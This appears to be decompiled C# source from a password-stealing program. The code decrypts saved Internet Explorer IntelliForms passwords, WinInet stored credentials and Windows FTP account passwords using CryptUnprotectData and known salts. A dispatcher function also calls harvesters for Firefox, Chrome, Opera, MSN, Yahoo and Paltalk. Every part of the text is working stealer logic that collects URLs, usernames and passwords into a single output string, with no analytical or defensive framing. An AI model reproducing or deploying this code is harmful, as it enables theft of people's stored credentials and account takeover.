// Token: 0x060000B5 RID: 181 RVA: 0x00006E38 File Offset: 0x00005038
private void AddPasswdInfo(string strRess, int hKey)
{
strRess = Strings.LCase(strRess);
byte[] bytes = Encoding.Unicode.GetBytes(strRess);
string text = this.GetSHA1Hash(ref bytes);
text += Strings.Right("00" + Conversion.Hex(this.CheckSum(ref text)), 2);
int num2;
int num3;
int num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, IntPtr.Zero, ref num3);
bool flag = num3 > 0;
if (flag)
{
IntPtr lpData = Marshal.AllocHGlobal(num3);
num = CIE7Passwords.RegQueryValueEx(hKey, ref text, 0, ref num2, lpData, ref num3);
CIE7Passwords.DATA_BLOB data_BLOB;
data_BLOB.cbData = num3;
data_BLOB.pbData = lpData.ToInt32();
CIE7Passwords.DATA_BLOB data_BLOB2;
data_BLOB2.cbData = checked (Strings.Len(strRess) * 2 + 2);
IntPtr hglobal = Marshal.StringToHGlobalUni(strRess);
data_BLOB2.pbData = hglobal.ToInt32();
CIE7Passwords.DATA_BLOB dataOut;
CIE7Passwords.CryptUnprotectData(ref data_BLOB, 0, ref data_BLOB2, 0, 0, 0, ref dataOut);
this.ProcessIEPass(strRess, text, dataOut);
hglobal = new IntPtr(data_BLOB2.pbData);
Marshal.FreeHGlobal(hglobal);
CIE7Passwords.LocalFree(dataOut.pbData);
}
}
// Token: 0x0600003D RID: 61 RVA: 0x00002E5C File Offset: 0x0000105C
public static string GT()
{
p.OL = "";
p.P1();
p.P2();
p.dyn();
p.paltalk();
firefox5.GetFire();
Chrome.Gchrome();
p.Msn();
p.Yahoo();
p.GetOpera();
CIE7Passwords cie7Passwords = new CIE7Passwords();
cie7Passwords.Refresh();
return(p.OL);
}
// Token: 0x060000B7 RID: 183 RVA: 0x00006F5C File Offset: 0x0000515C
public void Refresh()
{
checked
{
try
{
Regex regex = new Regex("name=\"([^\"]+)\"", RegexOptions.Compiled);
int hKey = -2147483647;
string text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage1";
int num;
CIE7Passwords.RegOpenKeyEx(hKey, ref text, 0, 131097, ref num);
int hKey2 = -2147483647;
text = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2";
int num2;
CIE7Passwords.RegOpenKeyEx(hKey2, ref text, 0, 131097, ref num2);
bool flag = num2 != 0 || num != 0;
if (flag)
{
text = null;
int num4;
int num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, IntPtr.Zero, ref num4);
flag = (num4 > 0);
if (flag)
{
IntPtr intPtr = Marshal.AllocHGlobal(num4);
Marshal.WriteInt32(intPtr, num4);
text = null;
num3 = CIE7Passwords.FindFirstUrlCacheEntry(ref text, intPtr, ref num4);
do
{
CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO;
object obj = Marshal.PtrToStructure(intPtr, internet_CACHE_ENTRY_INFO.GetType());
CIE7Passwords.INTERNET_CACHE_ENTRY_INFO internet_CACHE_ENTRY_INFO2;
internet_CACHE_ENTRY_INFO = ((obj != null) ? ((CIE7Passwords.INTERNET_CACHE_ENTRY_INFO)obj) : internet_CACHE_ENTRY_INFO2);
flag = ((internet_CACHE_ENTRY_INFO.CacheEntryType & 2097153) != 0);
if (flag)
{
IntPtr intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszSourceUrlName);
string text2 = this.GetStrFromPtrA(intPtr2);
flag = (text2.IndexOf("?") >= 0);
if (flag)
{
text2 = text2.Substring(0, text2.IndexOf("?"));
}
flag = (Strings.InStr(text2, "@", CompareMethod.Binary) > 0);
if (flag)
{
text2 = Strings.Mid(text2, Strings.InStr(text2, "@", CompareMethod.Binary) + 1);
}
flag = (num != 0 && (internet_CACHE_ENTRY_INFO.CacheEntryType & 1) == 1);
if (flag)
{
intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpHeaderInfo);
string strFromPtrA = this.GetStrFromPtrA(intPtr2);
flag = (!string.IsNullOrEmpty(strFromPtrA) && strFromPtrA.Contains("text/html"));
if (flag)
{
intPtr2 = new IntPtr(internet_CACHE_ENTRY_INFO.lpszLocalFileName);
string strFromPtrA2 = this.GetStrFromPtrA(intPtr2);
try
{
try
{
foreach (object obj2 in regex.Matches(File.ReadAllText(strFromPtrA2)))
{
Match match = (Match)obj2;
this.AddPasswdInfo(match.Groups[1].Value, num);
}
}
finally
{
IEnumerator enumerator;
flag = (enumerator is IDisposable);
if (flag)
{
(enumerator as IDisposable).Dispose();
}
}
}
catch (Exception ex)
{
}
}
}
this.AddPasswdInfo(text2, num2);
}
num4 = 0;
CIE7Passwords.FindNextUrlCacheEntry(num3, IntPtr.Zero, ref num4);
Marshal.FreeHGlobal(intPtr);
flag = (num4 > 0);
if (flag)
{
intPtr = Marshal.AllocHGlobal(num4);
Marshal.WriteInt32(intPtr, num4);
}
}while (CIE7Passwords.FindNextUrlCacheEntry(num3, intPtr, ref num4) != 0);
CIE7Passwords.FindCloseUrlCache(num3);
}
CIE7Passwords.RegCloseKey(num);
CIE7Passwords.RegCloseKey(num2);
}
string lpszFilter = "Microsoft_WinInet_*";
int num5;
int num6;
CIE7Passwords.CredEnumerate(lpszFilter, 0, ref num5, ref num6);
short[] array = new short[37];
flag = (num5 > 0);
CIE7Passwords.DATA_BLOB data_BLOB;
CIE7Passwords.DATA_BLOB data_BLOB2;
CIE7Passwords.DATA_BLOB data_BLOB3;
if (flag)
{
int num7 = 0;
int num8 = num5 - 1;
int num9 = num7;
for (;;)
{
int num10 = num9;
int num11 = num8;
if (num10 > num11)
{
break;
}
IntPtr intPtr2 = new IntPtr(num6 + num9 * 4);
IntPtr intPtr = Marshal.ReadIntPtr(intPtr2);
CIE7Passwords.CREDENTIAL credential;
object obj3 = Marshal.PtrToStructure(intPtr, credential.GetType());
CIE7Passwords.CREDENTIAL credential2;
credential = ((obj3 != null) ? ((CIE7Passwords.CREDENTIAL)obj3) : credential2);
intPtr2 = new IntPtr(credential.lpstrTargetName);
string str = this.CopyString(intPtr2);
data_BLOB.cbData = 74;
intPtr = Marshal.AllocHGlobal(74);
string str2 = "abe2869f-9b47-4cd9-a358-c22904dba7f7\0";
int num12 = 0;
int num13;
do
{
Marshal.WriteInt16(intPtr, num12 * 2, (short)(Strings.Asc(Strings.Mid(str2, num12 + 1, 1)) * 4));
num12++;
num13 = num12;
num11 = 36;
}while (num13 <= num11);
data_BLOB.pbData = intPtr.ToInt32();
data_BLOB2.pbData = credential.lpbCredentialBlob;
data_BLOB2.cbData = credential.dwCredentialBlobSize;
data_BLOB3.cbData = 0;
data_BLOB3.pbData = 0;
CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3);
Marshal.FreeHGlobal(intPtr);
intPtr2 = new IntPtr(data_BLOB3.pbData);
string expression = Marshal.PtrToStringUni(intPtr2);
string[] array2 = Strings.Split(expression, ":", -1, CompareMethod.Binary);
int num14 = Strings.InStr(Strings.Mid(str, 19), "/", CompareMethod.Binary);
p.OL = string.Concat(new string[]
{
p.OL,
"|URL| ",
Strings.Mid(str, 19, num14 - 1),
"\r\n|USR| ",
array2[0],
"\r\n|PWD| ",
array2[1],
"\r\n"
});
CIE7Passwords.LocalFree(data_BLOB3.pbData);
num9++;
}
}
CIE7Passwords.CredFree(num6);
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\FTP\\Accounts");
foreach (string text3 in registryKey.GetSubKeyNames())
{
RegistryKey registryKey2 = registryKey.OpenSubKey(text3);
foreach (string text4 in registryKey2.GetSubKeyNames())
{
RegistryKey registryKey3 = registryKey2.OpenSubKey(text4);
byte[] array3 = (byte[])registryKey3.GetValue("Password");
byte[] array4 = new byte[4];
int num15 = 0;
int num16 = text3.Length - 1;
int num17 = num15;
for (;;)
{
int num18 = num17;
int num11 = num16;
if (num18 > num11)
{
break;
}
byte b = (byte)(text3[num17] & '\u001f');
array4[num17 & 3] = unchecked (array4[num17 & 3] + b);
num17++;
}
data_BLOB2.cbData = array3.Length;
IntPtr intPtr2 = Marshal.AllocHGlobal(array3.Length);
data_BLOB2.pbData = intPtr2.ToInt32();
byte[] source = array3;
int startIndex = 0;
intPtr2 = new IntPtr(data_BLOB2.pbData);
Marshal.Copy(source, startIndex, intPtr2, array3.Length);
data_BLOB3.cbData = 0;
data_BLOB3.pbData = 0;
GCHandle gchandle = GCHandle.Alloc(array4, GCHandleType.Pinned);
intPtr2 = gchandle.AddrOfPinnedObject();
data_BLOB.pbData = intPtr2.ToInt32();
data_BLOB.cbData = 4;
CIE7Passwords.CryptUnprotectData(ref data_BLOB2, 0, ref data_BLOB, 0, 0, 0, ref data_BLOB3);
gchandle.Free();
string[] array5 = new string[8];
array5[0] = p.OL;
array5[1] = "|URL| ";
array5[2] = string.Format("ftp://{0}@{1}/", text3, text4);
array5[3] = "\r\n|USR| ";
array5[4] = text4;
array5[5] = "\r\n|PWD| ";
string[] array6 = array5;
int num19 = 6;
intPtr2 = new IntPtr(data_BLOB3.pbData);
array6[num19] = Marshal.PtrToStringUni(intPtr2);
array5[7] = "\r\n";
p.OL = string.Concat(array5);
CIE7Passwords.LocalFree(data_BLOB3.pbData);
}
}
}
catch (Exception ex2)
{
}
}
}
// Token: 0x060000B4 RID: 180 RVA: 0x00006984 File Offset: 0x00004B84
private void ProcessIEPass(string strURL, string strHash, CIE7Passwords.DATA_BLOB dataOut)
{
CIE7Passwords.StringIndexEntry stringIndexEntry;
int num = Strings.Len(stringIndexEntry);
CIE7Passwords.StringIndexHeader stringIndexHeader;
int num2 = Strings.Len(stringIndexHeader);
int pbData = dataOut.pbData;
IntPtr ptr = new IntPtr(dataOut.pbData);
checked
{
IntPtr ptr2 = new IntPtr(pbData + (int)Marshal.ReadByte(ptr));
object obj = Marshal.PtrToStructure(ptr2, stringIndexHeader.GetType());
CIE7Passwords.StringIndexHeader stringIndexHeader2;
stringIndexHeader = ((obj != null) ? ((CIE7Passwords.StringIndexHeader)obj) : stringIndexHeader2);
bool flag = stringIndexHeader.dwType == 1;
if (flag)
{
bool flag2 = stringIndexHeader.dwEntriesCount >= 2;
if (flag2)
{
IntPtr intPtr = new IntPtr(ptr2.ToInt32() + stringIndexHeader.dwStructSize);
IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num);
int num3 = 0;
int num4 = stringIndexHeader.dwEntriesCount - 1;
int num5 = num3;
for (;;)
{
int num6 = num5;
int num7 = num4;
if (num6 > num7)
{
break;
}
flag2 = (value == IntPtr.Zero | intPtr == IntPtr.Zero);
if (flag2)
{
break;
}
object obj2 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
CIE7Passwords.StringIndexEntry stringIndexEntry2;
stringIndexEntry = ((obj2 != null) ? ((CIE7Passwords.StringIndexEntry)obj2) : stringIndexEntry2);
IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
flag2 = (CIE7Passwords.lstrlenA(intPtr2) != stringIndexEntry.dwDataSize);
string text;
if (flag2)
{
ptr = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text = Marshal.PtrToStringUni(ptr);
}
else
{
intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text = Marshal.PtrToStringAnsi(intPtr2);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
object obj3 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
stringIndexEntry = ((obj3 != null) ? ((CIE7Passwords.StringIndexEntry)obj3) : stringIndexEntry2);
string text2 = Strings.Space(stringIndexEntry.dwDataSize);
intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
flag2 = (CIE7Passwords.lstrlenA(intPtr2) != stringIndexEntry.dwDataSize);
if (flag2)
{
ptr = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text2 = Marshal.PtrToStringUni(ptr);
}
else
{
intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text2 = Marshal.PtrToStringAnsi(intPtr2);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
p.OL = string.Concat(new string[]
{
p.OL,
"|URL| ",
strURL,
"\r\n|USR| ",
text,
"\r\n|PWD| ",
text2,
"\r\n"
});
num5 += 2;
}
}
}
else
{
bool flag2 = stringIndexHeader.dwType == 0;
if (flag2)
{
string text2 = null;
IntPtr intPtr = new IntPtr(ptr2.ToInt32() + stringIndexHeader.dwStructSize);
IntPtr value = new IntPtr(intPtr.ToInt32() + stringIndexHeader.dwEntriesCount * num);
flag2 = (value == IntPtr.Zero | intPtr == IntPtr.Zero);
if (!flag2)
{
int num8 = 0;
int num9 = stringIndexHeader.dwEntriesCount - 1;
int num10 = num8;
for (;;)
{
int num11 = num10;
int num7 = num9;
if (num11 > num7)
{
break;
}
object obj4 = Marshal.PtrToStructure(intPtr, stringIndexEntry.GetType());
CIE7Passwords.StringIndexEntry stringIndexEntry2;
stringIndexEntry = ((obj4 != null) ? ((CIE7Passwords.StringIndexEntry)obj4) : stringIndexEntry2);
string text = Strings.Space(stringIndexEntry.dwDataSize);
IntPtr intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
flag2 = (CIE7Passwords.lstrlenA(intPtr2) != stringIndexEntry.dwDataSize);
if (flag2)
{
ptr = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text = Marshal.PtrToStringUni(ptr);
}
else
{
intPtr2 = new IntPtr(value.ToInt32() + stringIndexEntry.dwDataOffset);
text = Marshal.PtrToStringAnsi(intPtr2);
}
intPtr = new IntPtr(intPtr.ToInt32() + num);
p.OL = string.Concat(new string[]
{
p.OL,
"|URL| ",
strURL,
"\r\n|USR| ",
text,
"\r\n|PWD| ",
text2,
"\r\n"
});
num10++;
}
}
}
}
}
}
